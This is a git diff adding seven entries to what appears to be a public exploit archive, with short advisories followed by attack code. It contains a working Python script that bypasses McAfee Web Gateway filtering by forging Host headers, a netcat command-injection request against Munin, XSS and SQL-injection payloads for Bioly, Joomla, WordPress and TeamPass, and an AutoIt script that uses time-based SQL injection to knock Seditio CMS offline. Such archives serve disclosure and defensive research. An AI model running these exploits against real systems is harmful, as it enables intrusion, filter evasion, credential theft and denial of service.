diff --git a/files.csv b/files.csv
index 84c7f68fa..85dfc377a 100755
--- a/files.csv
+++ b/files.csv
@@ -17856,7 +17856,7 @@ id,file,description,date,author,platform,type,port
 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x Firewall Denial of Service Vulnerability",2001-01-08,Nsfocus,sco,dos,0
 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0
 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0
-20535,platforms/linux/local/20535.txt,"ReiserFS 3.5.28 Kernel Oops and Code Execution Vulnerability",2001-01-09,"Marc Lehmann",linux,local,0
+20535,platforms/linux/local/20535.txt,"ReiserFS 3.5.28 Kernel - DoS & Code Execution Vulnerability",2001-01-09,"Marc Lehmann",linux,local,0
 20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0
 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0
@@ -33464,3 +33464,10 @@ id,file,description,date,author,platform,type,port
 37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection Vulnerabilities",2015-05-21,"Filippo Roncari",php,webapps,80
 37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability",2015-05-21,"Hannes Trunde",php,webapps,80
+37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x 'Host' HTTP Header Security Bypass Vulnerability",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0
+37082,platforms/php/webapps/37082.txt,"Bioly 1.3 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2012-04-16,T0xic,php,webapps,0
+37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0
+37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 Remote Command Injection Vulnerability",2012-04-13,"Helmut Grohne",cgi,webapps,0
+37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
+37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
+37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
diff --git a/platforms/cgi/webapps/37084.txt b/platforms/cgi/webapps/37084.txt
new file mode 100755
index 000000000..4e84b56ea
--- /dev/null
+++ b/platforms/cgi/webapps/37084.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53032/info
+
+Munin is prone to a remote command-injection vulnerability.
+
+Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. 
+
+printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80 
\ No newline at end of file
diff --git a/platforms/multiple/remote/37081.py b/platforms/multiple/remote/37081.py
new file mode 100755
index 000000000..1f0c2ed08
--- /dev/null
+++ b/platforms/multiple/remote/37081.py
@@ -0,0 +1,165 @@
+source: http://www.securityfocus.com/bid/53015/info
+
+McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules.
+
+A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks.
+
+McAfee Web Gateway 7 is vulnerable; other versions may also be affected.
+
+import socket,struct,sys,time
+from threading import Thread
+
+
+#The timeOut can be changed if the proxy is slow.
+#Tested in GMail, Facebook, Youtube and several blocked sites.
+#The proxy get the Host field of the http header and do not verify anything else.
+#It trusts on the HTTP Header and it can be modified by the attacker.
+
+timeOut = 0.8
+isGet = 0
+hostNameG = ""
+pacoteGet = ""
+port = 8080 #Listening port
+proxyAddr = "vulnerableProxy.com" #vulnerable proxy
+proxyPort = 8080 # proxy port
+
+def handle(client,globalSock):
+	
+	client.settimeout(timeOut)
+	
+	global hostNameG
+	
+
+	while 1:
+		
+		dados = ""
+		tam = 0
+		while 1:
+                        try:
+                                dados2 = client.recv(1024)
+                                tam = tam + len(dados2)
+                                dados = dados + dados2
+                        except socket.timeout:
+                               
+                                break
+
+		
+		dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD
+		if dd != -1:
+		  dd2 = dados.find(":")
+		  hostName = dados[dd+8:dd2]
+		  
+		  ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain
+		  pacote = dados
+		  hostHeader = "Host: " + hostName
+		  pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy
+		  pacote = pacote.replace(hostName, ipAddr) #changind domain for ip
+		  
+		  
+		  
+		  dados = pacote
+		
+		getd = dados.find("GET ")
+		getd2 = dados.find("//")
+		getd3 = dados.find("/", getd2+2)
+		hostName = dados[getd2+2:getd3]
+		
+		
+		if getd != -1:
+		  globalSock.close()
+		  globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		  globalSock.connect((proxyAddr,proxyPort))
+		  globalSock.settimeout(timeOut)
+		  getd2 = dados.find("//")
+		  getd3 = dados.find("/", getd2+2)
+		  
+		  hostName = dados[getd2+2:getd3]
+		  
+		  proxyAuth = ""
+		  proxyAuthN = dados.find("Proxy-Authorization:")
+		  if proxyAuthN != -1:
+		    proxyAuthNN = dados.find("\r\n", proxyAuthN)
+		    proxyAuth = dados[proxyAuthN:proxyAuthNN]
+		    
+		    
+		  ipAddr = socket.gethostbyname(hostName)
+		  
+		  info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
+		  if proxyAuthN != -1:
+		    info += proxyAuth + "\r\n"
+		  
+		  info += "Host: www.uol.com.br\r\n\r\n"
+		  
+		  globalSock.send(info)
+		  tam = 0
+		  gdata = ""
+		  
+		  while 1:
+			try:
+				
+				gdata2 = globalSock.recv(1024)
+				
+				tam = tam + len(gdata2)
+				gdata = gdata + gdata2
+				
+				if len(gdata2) == 0: 
+					break
+				
+				
+			except socket.timeout:
+				
+				break
+		  
+		
+		
+		  
+		
+		globalSock.send(dados)
+		tam = 0
+		gdata = ""
+		
+		while 1:
+			try:
+				
+				gdata2 = globalSock.recv(1024)
+				
+				if len(gdata2) > 0:
+					client.send(gdata2)
+				
+				tam = tam + len(gdata2)
+				gdata = gdata + gdata2
+				
+				if len(gdata2) == 0: 
+					break
+				
+				
+			except socket.timeout:
+				
+				break
+		
+		
+
+
+print 'Proxy Bypass'
+print 'by Gabriel Menezes Nunes'
+print 'Tested on McAfee Web Gateway 7 and Squid Proxy'
+sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print 'Attacked Proxy:',
+print proxyAddr
+print 'Listening on',
+print port
+sockzao.bind(("",port))
+
+sockzao.listen(6)
+
+while 1:
+	print 'Waiting for connections'
+	client, address = sockzao.accept()
+	print 'Client Connected'
+	print address
+	globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	globalSock.connect((proxyAddr,proxyPort))
+	globalSock.settimeout(timeOut)
+
+	t = Thread(target=handle, args=(client,globalSock,))
+	t.start()
diff --git a/platforms/php/webapps/37082.txt b/platforms/php/webapps/37082.txt
new file mode 100755
index 000000000..62a6433d2
--- /dev/null
+++ b/platforms/php/webapps/37082.txt
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/53018/info
+
+Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Bioly 1.3 is vulnerable; other versions may also be affected. 
+
+Cross Site Scripting
+POST /index.php?action=3 HTTP/1.1
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+User-Agent: STORED XSS TEST
+Host: localhost
+Content-Length: 68
+Connection: Close
+Pragma: no-cache
+
+# [Post Data:]==>
+email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1
+
+
+SQL Injection
+POST /index.php?action=11 HTTP/1.1
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Sql Injection
+Host: localhost
+Content-Length: 68
+Connection: Close
+Pragma: no-cache
+
+# [Post Data:]==>
+q=%00'
\ No newline at end of file
diff --git a/platforms/php/webapps/37083.txt b/platforms/php/webapps/37083.txt
new file mode 100755
index 000000000..0fb1b9d33
--- /dev/null
+++ b/platforms/php/webapps/37083.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/53030/info
+
+Joomla! Beatz Plugin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
+
+http://www.example.com/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
+
+http://www.example.com/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find
+
+http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search 
\ No newline at end of file
diff --git a/platforms/php/webapps/37085.txt b/platforms/php/webapps/37085.txt
new file mode 100755
index 000000000..3a7cf7839
--- /dev/null
+++ b/platforms/php/webapps/37085.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/53036/info
+
+Seditio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Seditio CMS 165 is vulnerable; prior versions may also be affected. 
+
+$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.
+$first=$targetsite & '/forums.php'; // our 1'st request will go here.
+
+HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun
+InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.
+Sleep(1500); //sleeping 1.5 second (*Waiting operation*)
+HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.
+InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.
+Exit; //exit from exploit
\ No newline at end of file
diff --git a/platforms/php/webapps/37086.txt b/platforms/php/webapps/37086.txt
new file mode 100755
index 000000000..356fb8114
--- /dev/null
+++ b/platforms/php/webapps/37086.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/53037/info
+
+Yahoo Answer plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[]/[]/process-imported-question.php?catname=[xss]
+http://www.example.com/[]/[]/editautopilot.php?query=[xss] 
\ No newline at end of file
diff --git a/platforms/php/webapps/37087.txt b/platforms/php/webapps/37087.txt
new file mode 100755
index 000000000..baf42ab68
--- /dev/null
+++ b/platforms/php/webapps/37087.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/53038/info
+
+TeamPass is prone to an HTML-injection vulnerability because it fails to sanitize user-supplied input.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
+
+TeamPass 2.1.5 is vulnerable; other versions may also be affected.
+
+POST /TeamPass/sources/users.queries.php HTTP/1.1
+type=add_new_user&login=[XSS]&pw=testing2&email=test&admin=false&manager=true&read_only=false&personal_folder=false&new_folder_role_domain=false&domain=test&key=key 
\ No newline at end of file